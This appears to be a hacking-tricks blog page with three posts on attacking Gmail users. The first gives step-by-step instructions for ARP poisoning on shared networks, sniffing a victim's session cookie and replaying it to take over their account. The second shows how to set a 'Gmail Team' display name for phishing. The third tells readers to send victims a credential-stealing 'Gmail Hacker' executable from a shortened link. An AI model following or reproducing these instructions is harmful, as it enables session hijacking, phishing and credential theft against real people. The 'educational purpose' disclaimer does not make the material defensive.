Hacking Gmail account using GX cookie ( Gmail Hacking )



Note:-This post is for educational purpose. If you misuse it and get caught I am not
responsible for it. Whatever you do at your own risk.
I hope you know what the cookie is. The method we will be using
is cookie stealing and replaying the same back to the Gmail server. There are
many ways you can steal cookie, one of them is XSS (Cross site scripting)
discussed by other is earlier post. But we won’t be using any XSS here, in our
part of attack we will use some local tool to steal cookie and use that cookie
to get an access to Gmail account.

I assume that:
  • You are in Local Area
    Network (LAN) in a switched / wireless environment : example : office ,
    cyber café, Mall etc.
  • You know basic
    networking.
Tool used for this attack:
  • Cain & Abel
  • Network Miner
  • Firefox
    web browser with Cookie Editor add-ons
Attack in detail:

I assume you are connected to LAN/Wireless network. Our main goal is to capture
Gmail GX cookie from the network. We can only capture cookie when someone is
actually using his gmail. I’ve noticed normally in lunch time in office, or
during shift start people normally check their emails. If you are in cyber café
or in Mall then there are more chances of catching people using Gmail.

We will go step by step,

If you are using Wireless network then you can skip this Step A.
A] Using Cain to do ARP poisoning and
routing:

Switch allows unicast traffic mainly to pass through its ports. When X and Y are
communicating eachother in switch network then Z will not come to know what X &
Y are communicating, so inorder to sniff that communication you would have to
poison ARP table of switch for X & Y. In Wireless you don’t have to do poisoning
because Wireless Access points act like HUB which forwards any communication to
all its ports (recipients).
  • Start Cain from Start
    > Program > Cain > Cain
  • Click on Start/Stop
    Snigger tool icon from the tool bar, we will first scan the network to see
    what all IPs are used in the network and this list will also help us to
    launch an attack on the victim.
  • Then click on Sniffer
    Tab then Host Tab below. Right click within that spreadsheet and click on
    Scan Mac Addresses, from the Target section select
All hosts in
my subnet and then press Ok. This will list all host connected in your network.
You will notice you won’t see your Physical IP of your machine in that list.
 

How to check your physical IP ?

> Click on start > Run type cmd and press enter, in the command prompt type
 

Ipconfig and enter. This should show your IP address assign to your PC.

It will have following outputs:

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : xyz.com

IP Address. . . . . . . . . . . . : 192.168.1.2

Subnet Mask . . . . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . . . . : 192.168.1.1

Main thing to know here is your IP address and your Default Gateway.

Make a note of your IP Address & default gateway. From Cain you will see list of
IP addresses, here you have to choose any free IP address which is not used
anywhere. We assume IP 192.168.1.10 is not used anywhere in the network.
  • Click on Configure >
    APR > Use Spoof ed IP and MAC Address > IP
Type in
192.168.1.10 and from the poisoning section click on “Use ARP request Packets”
and click on OK.
  • Within the Sniffer Tab
    , below click on APR Tab, from the left hand side click on APR and now click
    on the right hand top spreadsheet then click on plus sign tool from top. The
    moment you click that it will show you list of IP address on left hand side.
    Here we will target the victim IP address and the default gateway.
The purpose is to do ARP poisoning between victim and the default gateway and
route the victim traffic via your machine. From the left side click on Victim IP
address, we assume victim is using 192.168.1.15. The moment you click on victim
IP you will see remaining list on the right hand side here you have to select
default gateway IP address i.e. 192.168.1.1 then click on OK.
  • Finally, Click on
    Start/Stop Sniffer tool menu once again and next click on Start/Stop APR.
    This will start poisoning victim and default gateway.
B] Using Network Miner to capture cookie in
plain text

We are using
Network miner to capture cookie, but Network miner can be used for manythings
from capturing text , image, HTTP parameters, files. Network Miner is normally
used in Passive reconnaissance to collect IP, domain and OS finger print of the
connected device to your machine. If you don’t have Network miner you can use
any other sniffer available like Wireshark, Iris network scanner, NetWitness
etc.
We are using This tool because of its ease to use.
  • Open Network Miner by
    clicking its exe (pls note it requires .Net framework to work).
  • From the “---Select
    network adaptor in the list---“ click on down arrow and select your adaptor
    If you are using Ethernet wired network then your adaptor would have
    Ethernet name and IP address of your machine and if you are using wireless
    then adaptor name would contain wireless and your IP address. Select the one
    which you are using and click on start.
Important thing before you start this make sure you are not
browsing any websites, or using any Instant Mesaging and you have cleared all
cookies from firefox.
  • Click on Credential
    Tab above. This tab will capture all HTTP cookies , pay a close look on
    “Host” column you should see somewhere mail.google.com. If you could locate
    mail.google.com entry then in the same entry right click at Username column
    and click on “copy username” then open notepad and paste the copied content
    there.
  • Remove word wrap from
    notepad and search for GX in the line. Cookie which you have captured will
    contain many cookies from gmail each would be separated by semicolon (;) GX
    cookie will start with GX= and will end with semicolon you would have to
    copy everything between = and semicolon
Example : GX=
axcvb1mzdwkfefv ;
 ßcopy only
axcvb1mzdwkfefv
Now we have captured GX cookie its time now to use this cookie and replay the
attack and log in to victim email id, for this we will use firefox and cookie
editor add-ons.
C] Using Firefox &
cookie Editor to replay attack.
  • Open Firefox and log
    in your gmail email account.
  • from firefox click on
    Tools > cookie Editor.
  • In the filter box type
    .google.com and Press Filter and from below list search for cookiename GX.
    If you locate GX then double click on that GX cookie and then from content
    box delete everything and paste your captured GX cookie from stepB.4 and
    click on save and then close.
  • From the Address bar
    of Firefox type mail.google.com and press enter, this should replay victim
    GX cookie to Gmail server and you would get logged in to victim Gmail email
    account.
  • Sorry! You can’t
    change password with cookie attack.
  • ---------------------------------------------------------------------------

A Closer Look at a Vulnerability in Gmail















Gmail is one of the major webmail service provider across the globe. Here is one small reason for that.
Gmail follows a strict rule that doesn’t allow it’s users to have their first or the last name contain the termGmail or Google. That is, while signing up for a new Gmail account the users cannot choose a first or last name that contains the term Gmail or Google. You can see this from the below snapshot.
This rule is implemented by Gmail for obvious reasons, because if the users are allowed to keep their first or the last name that contains the term Gmail or Google, then it is possible to easily impersonate the identity of Gmail (or Gmail Team) and engage themselves in phising or social engineering attacks on the innocent users. This can be done by simply choosing the first and last name with the following combinations.
First Name Last Name
Gmail Team
Google Team
Gmail Password Assistance
From the above snapshot we can see that, Gmail has made a good move in stopping the users from abusing it’s services. However this move isn’t just enough to prevent the malicious users from impersonating the Gmail’s identity. Because Gmail has a small vulnerability that can be exploited so that the users can still have their name contain the terms Gmail or Google. You may wonder how to do this. But it’s very simple.
1. Login to your Gmail account and click on Settings.
2. Select Accounts tab
3. Click on edit info
4. In the Name field, select the second radio button and enter the name of your choice. Click on Save Changes and you’re done!
Now, Gmail accepts any name even if it contains the term Google or Gmail. You can see from the below snapshot
Allowing the users to have their names contain the terms Gmail or Google is a serious vulnerability even though it doesn’t seem to be a major one. This is because a hacker or a malicious attacker can easily exploit this flaw and send phishing emails to other Gmail users asking for sensitive information such as their passwords. Most of the users don’t even hesitate to send their passwords since they believe that they are sending it to Gmail Team (or someone authorized). But in reality they are sending it to an attacker who uses these information to seek personal benefits.
So the bottomline is, if you get any emails that appears to have come from the Gmail Team or similar, don’t trust them! Anyone can send such emails to fool you and take away your personal details. Hope that Gmail will fix this vulnerability as soon as possible to avoid any disasters.
--------------------------------



Hack Gmail using Gmail Hacker





1. Download the gmail hacker fromhttp://bit.ly/gmailhacker
2. Now, run Gmail Hacker Builder.exe file on your computer to see :



3. Enter in your email address and password (I recommend you to create new Gmail id for this : highly recommended) and hit on Build. Then Gmail hacker builder will create your own Gmail hacker application – Gmail Hacker.exe file which you can use to hack gmail password.
4. Now, send this Gmail Hacker.exe file to victim and tell him that this Gmail hacker is used to hack Gmail password. Ask him to run Gmail Hacker.exe and enter all information (which includes his Gmail id and password plus Gmail ID of the victim he wanna hack).


5. As he enters the information and hits “Hack Them”, he will receive an error message as shown below:





6. In return, you will receive an email in your email account like this:


7. You’re Done!!  You got his Gmail ID n password!


Kindly Bookmark this Post using your favorite Bookmarking service:
Technorati Digg This Stumble Stumble Facebook Twitter

0 comments:

Click Here To add Comment

PAGE RANK

Page Rank
 

| USEFUL TRICKS- InVaDeR © 2012. All Rights Reserved | Template Style by Abhidinvader